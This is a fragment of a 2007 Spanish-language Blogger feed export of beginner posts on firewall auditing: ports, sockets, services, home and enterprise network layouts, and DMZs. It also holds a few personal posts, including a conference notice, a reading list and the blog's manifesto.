src='https://blogger.googleusercontent.com/tracker/1821337150970789352-950560695567034340?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/950560695567034340/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=950560695567034340' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/950560695567034340'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/950560695567034340'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/10/noticia-ataque-ddos.html' title='Noticia: Ataque DDoS'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-8697542339909835361</id><published>2007-10-09T22:03:00.001+02:00</published><updated>2007-10-09T22:17:15.834+02:00</updated><title type='text'>Tal dia como hoy....</title><content type='html'>&lt;a href="http://bp2.blogger.com/_x7dE_ssr2K8/RwvgPvFzyaI/AAAAAAAAABM/sNSLi4IxHOA/s1600-h/che-guevara-portrait-5001050.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5119431962380192162" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; CURSOR: hand" alt="" src="http://bp2.blogger.com/_x7dE_ssr2K8/RwvgPvFzyaI/AAAAAAAAABM/sNSLi4IxHOA/s200/che-guevara-portrait-5001050.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div&gt;Quiero hacer un recordatorio, al día de hoy, un 9 de Octubre....el motivo es porque tal día como hoy(hace 40 años), asesinaron al que podría ser, si hubiese sido informático, (que no médico) el mejor hacker de la historia... , quiero recordar a &lt;a href="http://es.wikipedia.org/wiki/Ernesto_Guevara"&gt;Ernesto Guevara de la Serna&lt;/a&gt;..."Che"&lt;/div&gt;&lt;br /&gt;&lt;div&gt;Personajes como este, hacen que se mueva el mundo, y que nos hagan ver las cosas desde otro punto de vista....&lt;/div&gt;&lt;div&gt; &lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;Hasta la victoria siempre!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-8697542339909835361?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/8697542339909835361/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=8697542339909835361' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/8697542339909835361'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/8697542339909835361'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/10/tal-dia-como-hoy.html' title='Tal dia como hoy....'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_x7dE_ssr2K8/RwvgPvFzyaI/AAAAAAAAABM/sNSLi4IxHOA/s72-c/che-guevara-portrait-5001050.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-2894725388628582671</id><published>2007-10-08T20:56:00.000+02:00</published><updated>2007-10-08T21:21:21.982+02:00</updated><title type='text'>El regreso de...Auditando Firewalls</title><content type='html'>Buenas a todos, después de una semana de inactividad en el Blog, vuelvo a la carga...y curiosidades de la vida, vengo de vuelta de auditar un Firewall empresarial...la semana fue productiva....&lt;br /&gt;&lt;br /&gt;No quiero empezar sin dedicar esta entrada al agente de Vitoria, que me han puesto las cosas muyyyyyy fáciles para poder currar, y como no a mi inestimable "GPS" con patas, que me guió tan bien por el maravilloso mundo de los pinchos....de lo que viene siendo Euskadi, si podéis, pasaros a conocerlo es una chulada.....&lt;br /&gt;&lt;br /&gt;Y una vez cumplidas las dedicatorias, vamos al tajo....&lt;br /&gt;&lt;br /&gt;Hay una frase que siempre aplico a una buena configuración de un Firewall, "niña cierra los puertos que te entran los barcosssss".&lt;br /&gt;&lt;br /&gt;Y esto que quiere decir?, a lo que me refiero con esa frase, es que una de las funciones importante por no decir las más importante en un Firewall es cerrar los puertos que publica nuestro S.O, asi pues, si nuestro Pc, no necesitase enviar correo, deberiamos configurar nuestro Firewall, para que este puerto en concreto el 25 aparezca cerrado, y no admita ninguna conexión desde Internet no deseada...&lt;br /&gt;&lt;br /&gt;La máxima es, que no publiquemos puertos que no sean necesarios, porque sino...nos entrarán los barcos!!!! hasta el muelle de descarga ;)&lt;br /&gt;&lt;br /&gt;Asi pues, como sabemos, detrás de un puerto hay un servicio, dicho servicio, si está publicado en Internet, sin restricciones de conexión, puede ser vulnerable...Porque, aunque vuestro sistema este parcheado 100% y ese servicio no tenga bugs, siempre, repito siempre, hay una persona detrás, la cual configura ese servicio, sea, Administrador de sistemas, o un usuario casero....y por lo tanto, cabe la posibilidad de que haya un error de configuración, como veis la seguridad 100% es imposible...&lt;br /&gt;&lt;br /&gt;Para un usuario malintencionado, lo primero que busca en una máquina a atacar, es un puerto abierto, y una vez que descubre ese puerto abierto, busca la versión del servicio publicado e intenta atacar, con la información recibida...(versión del S.O, versión del servicio publicado, ya sea FTP, SMTP etc...) ya sabeis la información es poder...&lt;br /&gt;&lt;br /&gt;En la próxima entrada aprenderemos a manejar alguna herramienta por no decir la "herramienta" de scanneos de puertos, el todo poderoso &lt;a href="http://insecure.org/nmap/"&gt;NMAP&lt;/a&gt;, larga vida &lt;a href="http://insecure.org/nmap/"&gt;NMAP&lt;/a&gt;....los que van a scannear te saludan!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-2894725388628582671?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/2894725388628582671/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=2894725388628582671' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/2894725388628582671'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/2894725388628582671'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/10/el-regreso-deauditando-firewalls.html' title='El regreso de...Auditando Firewalls'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-3861693023742992732</id><published>2007-09-30T11:12:00.000+02:00</published><updated>2007-09-30T11:59:43.793+02:00</updated><title type='text'>Auditando Firewalls: De sockets, puertos y servicios</title><content type='html'>Sigamos con lo siguiente en la auditoría de firewalls, el concepto de &lt;a href="http://es.wikipedia.org/wiki/Transmission_Control_Protocol"&gt;puerto &lt;/a&gt;, &lt;a href="http://es.wikipedia.org/wiki/Socket_de_Internet"&gt;socket&lt;/a&gt; y servicio algo fundamental para enterder como funciona un firewall, y asi como auditarlos ;)&lt;br /&gt;&lt;br /&gt;En capitulos anteriores definimos un firewall, como un elemento soft que monitorizada las conexiones entrantes y salientes de un &lt;a href="http://es.wikipedia.org/wiki/Host"&gt;host&lt;/a&gt;. Y os preguntareis para que sirven las conexiones? :P, para eso nos meteremos a ver un poco de &lt;a href="http://es.wikipedia.org/wiki/Transmission_Control_Protocol"&gt;TPC/IP&lt;/a&gt;.....&lt;br /&gt;&lt;br /&gt;Como sabeis el sr &lt;a href="http://es.wikipedia.org/wiki/Transmission_Control_Protocol"&gt;TCP/IP&lt;/a&gt; es un &lt;a href="http://es.wikipedia.org/wiki/Protocolo"&gt;protocolo&lt;/a&gt; , y como tal dicta unas normas...a las que los firewalls se someten ;) como el resto de programas que utilizamos (clientes de correo, nevegador, emule :p ftp).Entre muchas cosas &lt;a href="http://es.wikipedia.org/wiki/Transmission_Control_Protocol"&gt;TCP/IP&lt;/a&gt; nos dice que para que determinados servicios funcionen, tienen que estar publicados en una serie de &lt;a href="http://es.wikipedia.org/wiki/Lista_de_n%C3%BAmeros_de_puerto"&gt;puertos predefinidos..&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Es decir, si queremos enviar un correo electrónico desde nuestro programa cliente, este enviará la petición contra el puerto 25 del servidor que está escuchando...el cual que nos permitirá enviar correo electrónico al destinatario que queramos.&lt;br /&gt;Para esta acción, el firewall que tenemos en nuestro pc tiene que permitir la salida del tráfico generado por el protocolo &lt;a href="http://es.wikipedia.org/wiki/Simple_Mail_Transfer_Protocol"&gt;SMTP &lt;/a&gt;y el servidor que está en el otro lado tiene que escuchar el tráfico que vaya dirigido hacia ese puerto 25 (para lo cual su firewall tiene que permitir tráfico contra ese puerto) que también forma parte del mismo protocolo.&lt;br /&gt;&lt;br /&gt;Y quien permite que esa conexión, se realice? nuestros queridísimos firewalls!!! ya que permiten el tráfico que se genera a ambos lados (tanto de nuestro pc como del servidor de correo) y se produzca una conexión, para que el servicio pueda funcionar, y se puedan enviar esos correos tan altruistas con archivos adjuntos .ppt que tanto nos gustan... &lt;8-)&lt;br /&gt;&lt;br /&gt;Asi pues, como vereis, lo que hacen los firewalls es permitir o denegar flujo de conexiones contra puertos determinados...&lt;br /&gt;&lt;br /&gt;Un esquema explicativo funcionaría asi.... servicio-socket-puerto.....&lt;br /&gt;&lt;br /&gt;Un servidor &lt;a href="http://es.wikipedia.org/wiki/Hypertext_Transfer_Protocol"&gt;Http &lt;/a&gt;, para que pueda publicar páginas web, tiene que tener un servicio; que sería un servidor web como por ejemplo &lt;a href="http://www.apache.org/"&gt;Apache &lt;/a&gt;o &lt;a href="http://www.microsoft.com/windowsserver2003/iis/default.mspx"&gt;ISS&lt;/a&gt; de microchoft, que va "conectado" a un socket, el cual va asociado a un puerto en este caso por ser el protocolo Http, sería el puerto 80.&lt;br /&gt;&lt;br /&gt;Y???, como lo veis?....&lt;br /&gt;&lt;br /&gt;Un poco más abajo de esta mismo artículo se pueden poner comentarios ehhhhh son gratis...;)&lt;br /&gt;&lt;br /&gt;Cambio y corto!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-3861693023742992732?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/3861693023742992732/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=3861693023742992732' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/3861693023742992732'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/3861693023742992732'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/09/auditando-firewalls-de-sockets-y.html' title='Auditando Firewalls: De sockets, puertos y servicios'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-956404402215717358</id><published>2007-09-28T13:54:00.000+02:00</published><updated>2007-09-28T14:13:21.096+02:00</updated><title type='text'>Lecturas recomendadas para el finde</title><content type='html'>&lt;a href="http://hakin9.org/index.php?address=es/haking"&gt;Hakin9&lt;/a&gt;&lt;br /&gt;&lt;a href="http://blog.s21sec.com/2007/08/yabcc-yet-another-botnet-command-panel.html"&gt;Botnets&lt;/a&gt;&lt;a href="http://bebbop.eadevtech.com/blog/?p=50"&gt;&lt;br /&gt;Demo de Exchange Server 2007 en imagen de virtual pc&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.networksorcery.com/enp/topic/ipsuite.htm"&gt;Algo sobre protocolos&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Si me da tiempo y el cierre del Moreno´s Bar me lo permite :P seguiré este finde con la auditoria de firewalls, ñam ñam, quedan cosillas de &lt;a href="http://es.wikipedia.org/wiki/Cuadratura_del_c%C3%ADrculo"&gt;teoría&lt;/a&gt; y luego la &lt;a href="http://www.kriptopolis.org/images/bsod.gif"&gt;práctica&lt;/a&gt; ;) jejejeje&lt;br /&gt;&lt;br /&gt;Y...se siguen esperando comentarios.....iogaaaaaaaaaa!!&lt;br /&gt;&lt;br /&gt;Cambio y corto!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-956404402215717358?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/956404402215717358/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=956404402215717358' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/956404402215717358'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/956404402215717358'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/09/lecturas-recomendadas-para-el-finde.html' title='Lecturas recomendadas para el finde'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-6917403458764747451</id><published>2007-09-28T09:14:00.000+02:00</published><updated>2007-09-28T10:31:01.474+02:00</updated><title type='text'>Capsdesi</title><content type='html'>Buenas todos/as&lt;br /&gt;&lt;br /&gt;Por fin viernes.. santo viernes&lt;br /&gt;&lt;br /&gt;Asi que entremos en materia que el &lt;a href="http://img480.imageshack.us/img480/1248/homersofa2xn.jpg"&gt;fin de semana&lt;/a&gt; ya está aquiiiiiiiiiiiiiiiiiiiii!!!.&lt;br /&gt;&lt;br /&gt;Todos los años en la Universidad Politécnia de de Madrid (UPM) de la que soy miembro desde hace un par de años, (yaaaaaaaa padre yaaaaaaaaaaa si hubiera estudiado más antes....), se realiza el &lt;a href="http://www.capsdesi.upm.es/"&gt;CAPSDESI&lt;/a&gt;, que son unas conferencias, en donde gente experta, trata diferentes temas sobre seguridad de la información, el plazo de inscripción comienza el 15 de octubre y la asistencia es gratuita pero de aforo limitado a 550 almas yo iré y &lt;a href="http://www.yonkis.com/w.php?id=179200718242.jpg"&gt;tu&lt;/a&gt;???&lt;br /&gt;&lt;br /&gt;Y recuerda cual es el lado &lt;a href="http://farm1.static.flickr.com/165/358619547_67add2c009_o.jpg"&gt;oscuro&lt;/a&gt;....&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-6917403458764747451?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/6917403458764747451/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=6917403458764747451' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/6917403458764747451'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/6917403458764747451'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/09/capsdesi.html' title='Capsdesi'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-8960315171441902031</id><published>2007-09-26T13:03:00.001+02:00</published><updated>2007-09-26T13:23:12.518+02:00</updated><title type='text'>Auditando firewalls: Esquema de red "empresarial"</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_x7dE_ssr2K8/Rvo812y3SFI/AAAAAAAAABA/_2XwkEj6t5Y/s1600-h/empresa.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 274px; height: 242px;" src="http://bp2.blogger.com/_x7dE_ssr2K8/Rvo812y3SFI/AAAAAAAAABA/_2XwkEj6t5Y/s320/empresa.jpg" alt="" id="BLOGGER_PHOTO_ID_5114467222772205650" border="0" /&gt;&lt;/a&gt;  Lo que tenemos aquí sería el típico esquema de red a nivel empresarial, con dos niveles de firewal ;) para implementar más seguridad, y controlar el tráfico entrante y saliente en dos puntos, y si os fijais los firewalls aparecen en parejas, lo que se denomina &lt;a href="http://es.wikipedia.org/wiki/Cluster_%28inform%C3%A1tica%29"&gt;cluster&lt;/a&gt;, porque en caso de fallo, la empresa, no se queda "al descubierto" y sus conexiones no se ven afectadas, ni desde un punto de vista funcional ni de seguridad.&lt;br /&gt;&lt;br /&gt;También hay que fijarse en lo que se llama zona desmilitarizada o &lt;a href="http://es.wikipedia.org/wiki/DMZ"&gt;DMZ&lt;/a&gt;, a ver como lo explico... :p es una red separada de la red privada donde se desarrolla la actividad empresarial de los usuarios y servidores corporativos.&lt;br /&gt;&lt;br /&gt;Y esto porque se hace?, muy sencillo, en una &lt;a href="http://es.wikipedia.org/wiki/DMZ"&gt;DMZ&lt;/a&gt;, es donde nos encontramos los servidores que tienen direccionamiento público, y publican servicios en internet, os acordais del ejemplo casero? ;) como tal, estos servidores son los que se "exponen en internet" y son sobre los que el riesgo recae, por ser públicos, por eso mismo, en caso de que ocurra un incidente de seguridad, están apartados de la red privada corporativa para que, ese incidente no tenga repercusión en la red privada y por lo tanto en la organización entera.&lt;br /&gt;&lt;br /&gt;Que os parece todo este mogollón? Espero comentarios...... :P&lt;span style="text-decoration: underline;"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-8960315171441902031?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/8960315171441902031/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=8960315171441902031' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/8960315171441902031'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/8960315171441902031'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/09/lo-que-tenemos-aqu-sera-el-tpico.html' title='Auditando firewalls: Esquema de red &quot;empresarial&quot;'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_x7dE_ssr2K8/Rvo812y3SFI/AAAAAAAAABA/_2XwkEj6t5Y/s72-c/empresa.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-7165822815847214268</id><published>2007-09-25T17:25:00.000+02:00</published><updated>2007-09-26T12:54:52.493+02:00</updated><title type='text'>Auditando firewalls: Esquema de red "casero"</title><content type='html'>Seguimos con un poco más de teoría sobre  firewalls, como veis, esta sería la una arquitedtura de red en modo  "casero", en donde cualquier conexión  (entrante o saliente) es filtrada por  el firewall.&lt;br /&gt;&lt;br /&gt;Lo que tendríamos aquí es una conexión a internet con nuestra ip pública suministrada por nuestro queridísimo &lt;a href="http://es.wikipedia.org/wiki/Proveedor_de_servicios_de_Internet"&gt;ISP&lt;/a&gt; &lt;8-( con lo que nuestro Pc, se presenta en internet con la famosa ip públia.  Y claro si nos "presentamos" en internet con nuestra ip, es la que al resto del mundo le importa para acceder a los posibles servicios que ofrezcamos, como para nosotros acceder a los servicios que nos ofrecen.&lt;br /&gt;&lt;br /&gt;De tal manera que si monto un servidor "efetepe" y alguien quiere acceder tendrá que poner en su programa cliente de "efetepe" la dirección pública que ofrece ese servicio al resto del mundo.&lt;br /&gt;&lt;br /&gt;Fácil no?, os recuerdo que al final de cada "artículo" que escribo podeis poner comentarios...de lo mucho que os gusta la web etc... :P inclusive, de las posibles dudas que tengais....  &lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_x7dE_ssr2K8/Rvko9Gy3SDI/AAAAAAAAAAw/Zbyx_9syGm8/s1600-h/casa.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 262px; height: 174px;" src="http://bp2.blogger.com/_x7dE_ssr2K8/Rvko9Gy3SDI/AAAAAAAAAAw/Zbyx_9syGm8/s320/casa.jpg" alt="" id="BLOGGER_PHOTO_ID_5114163882116991026" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="file:///C:/Documents%20and%20Settings/dmartin6/Escritorio/casa.jpg" alt="" /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-7165822815847214268?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/7165822815847214268/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=7165822815847214268' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/7165822815847214268'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/7165822815847214268'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/09/seguimos-con-un-poco-ms-de-teora-sobre.html' title='Auditando firewalls: Esquema de red &quot;casero&quot;'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_x7dE_ssr2K8/Rvko9Gy3SDI/AAAAAAAAAAw/Zbyx_9syGm8/s72-c/casa.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-9033979512051848855</id><published>2007-09-25T10:02:00.000+02:00</published><updated>2007-09-25T12:16:52.830+02:00</updated><title type='text'>Auditando firewalls que es gerundio!</title><content type='html'>Salud2, navegantes....&lt;br /&gt;&lt;br /&gt;Siendo martes, día precioso, ya que no queda nada para el fin de semana (madreeeeeeeeeee), nos iniciaremos en el maravilloso mundo de los firewalls, que mejor día que un martes? asi que manos a la obra!&lt;br /&gt;&lt;br /&gt;Para empezar, definiré un firewall, como un elemento software que contiene una tabla de estado de las conexiones que pasan por el, tanto entrantes como salientes.En dichas tablas, es donde el firewall interpreta las conexiones para posteriormente realizar las acciones que le hemos indicado, es decir, bloquear o permitir el tráfico que pasa por el.&lt;br /&gt;&lt;br /&gt;Distinguimos dos tipos de firewall:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Firewalls a nivel de aplicación.&lt;/li&gt;&lt;li&gt;Firewalls a nivel de red.&lt;/li&gt;&lt;/ol&gt;&lt;div style="text-align: left;"&gt;Cada uno de ellos se mueve en capas diferentes del modelo &lt;a href="http://es.wikipedia.org/wiki/Modelo_OSI"&gt;O.S.I&lt;/a&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Firewalls a nivel de aplicación&lt;/li&gt;&lt;/ul&gt;Estos firewalls son lo que conocemos habitualmente como firewalls personales, actualmente, están enfocados a usuarios domésticos. Este tipo de firewalls tienen como misión el vigilar las conoxiones, que se realizan desde y contra nuestro ordenador personal, desde un punto de vista de aplicación.&lt;br /&gt;Es decir, los firewalls personales, controlan las conexiones que realizan las aplicaciones instaladas en nuestro ordenador personal, las cuales, necesitan conectarse a internet, o desde internet necesitan conectarse a ellas :(&lt;br /&gt;&lt;br /&gt;Existen en el mercado numerosos tipos de firewalls de aplicación, y bastantes de licencia &lt;a href="http://es.wikipedia.org/wiki/Gnu"&gt;GNU&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Firewalls a nivel de red&lt;/li&gt;&lt;/ul&gt;Este tipo de firewalls se mueven a un nivel más bajo del modelo OSI, entre las capas de nivel 2 , 3 y 4. Están pensados para un entorno empresarial, en donde la cantidad de conexiones que se puenden realizar, son cientos o incluso miles. Al haber una complejidad de conexiones a este nivel, los "vigilantes" (que son los firewalls) de este tipo de conexiones, tienen que tener unas características especiales, y diferentes a lo que son los firewalls de aplicación.&lt;br /&gt;&lt;br /&gt;Dichas características entre otras son:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Entorno de adminsitración más complejos.&lt;/li&gt;&lt;li&gt;Alta disponibilidad, mediante clusters.&lt;/li&gt;&lt;li&gt;Entorno de monotorización de las conexiones rechazadas permitidas, etc&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Etc..&lt;/li&gt;&lt;/ol&gt;Una vez, que hemos hecho una breve pero intensa introducción de lo que son los firewalls, empezaremos a "meterles mano" en los siguientes capítulos.&lt;br /&gt;&lt;br /&gt;Cambio y corto!&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-9033979512051848855?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/9033979512051848855/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=9033979512051848855' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/9033979512051848855'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/9033979512051848855'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/09/auditando-firewalls-que-es-gerundio-i.html' title='Auditando firewalls que es gerundio!'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-7293819287716864720</id><published>2007-09-24T16:51:00.000+02:00</published><updated>2007-09-25T15:09:57.471+02:00</updated><title type='text'>Manifiesto</title><content type='html'>&lt;p&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:verdana;"&gt;Buenas&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:verdana;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:verdana;"&gt;Mediante este medio tan poderoso como son las redes sociales y para simplificar los blogs, a partir de ahora, intentaré transmitiros, como vivo la seguridad de la información....y algunas cosas más que me parecen revelantes, tal como se mueve el mundo hoy en día...&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:verdana;"&gt;Compartir conocimientos, es la finalidad de este blog, todo el mundo debería de terner derecho a saber lo que ocurre en sus ordenadores y en la "selva" de internet con su fauna corespondiente....porque hay cada bicho suelto....&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:verdana;"&gt;No os espereis un blog para realizar el "mal" como por ejemplo de como  conseguir la contraseña del msn de tu chica o de como pisarle el wifi al vecino vamós que duros a 4 de las antiguas pesetas no va a ver, sino un sitio donde se puedan compartir conocimientos, e inquietudes con el único 